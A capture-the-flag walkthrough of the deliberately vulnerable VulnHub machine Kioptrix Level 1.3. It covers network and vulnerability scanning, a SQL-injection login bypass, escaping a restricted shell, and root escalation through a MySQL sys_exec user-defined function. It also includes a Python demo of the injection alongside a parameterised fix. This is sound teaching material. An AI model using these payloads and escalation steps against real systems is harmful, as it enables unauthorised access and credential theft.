VulnHub: Kioptrix: Level 1.3 (#4)

Link: https://www.vulnhub.com/entry/kioptrix-level-13-4,25

1. Network Discovery
nmap -sn 10.0.2.24/24

The machine ‘10.0.2.9’ is the target.

2. Port scan

nmap -Pn 10.0.2.9
nmap -Pn -p1000- 10.0.2.9

There are 4 open ports: 22, 80, 139 and 445.

3. OS and service scan

nmap -p 22,80,139,445 -A 10.0.2.9

4. Vuln scan

nmap -p 22,80,139,445 --script vuln 10.0.2.9

5. Nikto scan

nikto -h http://10.0.2.9

6. Samba scan

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.0.2.9

7. Access HTTP on port 80

View page source

Access directories

I found username and password from database.sql.

Try supplying in the form

username: john
password: 1234

Failed!!!

8. I'll try SQL injection

Username - ' or '1'='1
Password - ' or '1'='1

Another try w/ john

Username - john
Password - ' or '1'='1

Now, I have a username and password.
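To show why the payload from step 8 works, here is an added example of my own, not code from the VulnHub box or from this writeup. It rebuilds the login check the way checklogin.php appears to work: the page does not show that file's query, so the table name, column names and the concatenated SELECT are assumptions, and the rows are constructed (john's password is the one recovered above; the second row is made up). The vulnerable function returns every row the spliced-in query matches, and the parameterised function beside it shows the fix.

```python
import sqlite3

# Constructed sample rows standing in for the box's members table. john's
# password is the one the walkthrough recovers; the second row is made up.
SAMPLE_MEMBERS = [
    ("john", "MyNameIsJohn"),
    ("robert", "made-up-password"),
]

# The payload used in step 8 of the walkthrough.
PAYLOAD = "' or '1'='1"


def make_db():
    """In-memory SQLite stand-in for the MySQL database behind the login form."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)", SAMPLE_MEMBERS)
    return conn


def build_query(username, password):
    """Assumed shape of the query in checklogin.php (the page does not show it):
    user input is spliced straight into the SQL text, so quotes in the input
    change the structure of the statement."""
    return ("SELECT username, password FROM members "
            "WHERE username='%s' AND password='%s'" % (username, password))


def vulnerable_login(conn, username, password):
    """Run the concatenated query and return every row it matches."""
    return conn.execute(build_query(username, password)).fetchall()


def safe_login(conn, username, password):
    """Same check with bound parameters: quotes in the input are just data."""
    return conn.execute(
        "SELECT username, password FROM members WHERE username=? AND password=?",
        (username, password),
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print(build_query("john", PAYLOAD))
    # AND binds tighter than OR, so the WHERE clause is parsed as
    # (username='john' AND password='') OR '1'='1', which is true for every
    # row: the password check is bypassed and the stored passwords come back.
    for row in vulnerable_login(conn, "john", PAYLOAD):
        print("leaked:", row)
    # With bound parameters the same input matches nothing.
    print("parameterised:", safe_login(conn, "john", PAYLOAD))
```

Running it prints the assembled query, which makes the operator precedence visible: because `'1'='1'` is OR-ed onto the whole condition, the username in the first field makes no difference to which rows match, and an application that then displays the first matching row (or echoes the row's password field, as the box's member page does) hands the credentials over.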

9. Access via SSH

ssh john@10.0.2.9
(password: MyNameIsJohn)

Type ? to list the commands I'm allowed to run.

?

The login lands in a restricted shell, so I need a real TTY shell; the restricted shell's echo can be abused to spawn one.

echo os.system('/bin/bash')

Verify

whoami
pwd
ls -la

10. Data hunting and exploitation

cat /etc/passwd

There are 3 users.

Verify passwd permission

ls -la /etc/passwd

It belongs to root.

Verify shadow permission

ls -la /etc/shadow

It belongs to root.

cd /home/loneferret
ls -la

Not much useful

cd /home/robert
ls -la

Not much useful

Since I know that the HTTP site is backed by MySQL, I assumed that there must be a database username and password stored somewhere in the web root.

I found them in /var/www/checklogin.php

Verify sudo

sudo -l

Verify SUID

find / -perm -u=s -type f 2>/dev/null

Capabilities

getcap -r / 2>/dev/null

Cron job

cat /etc/crontab

Running service

ps aux | grep "^root"

MySQL is running as root, and I have its username and password.

Verify version

mysql --version

With this version I can use a UDF (user-defined function) to run commands as the MySQL process owner, i.e. root.

Verify gcc for further compiling

which gcc

I don't have gcc, so I can't compile a UDF library myself.

Maybe there's already a UDF library on the system; search for it.

find / 2>/dev/null | grep -i "udf"

Connect to mysql

mysql -u root -p

I will add the current user, john, to the admin group so that he can run any sudo command.

use mysql;
select sys_exec('usermod -a -G admin john');
exit

Verify

sudo -l

Change to root

sudo su -

Now I’m root.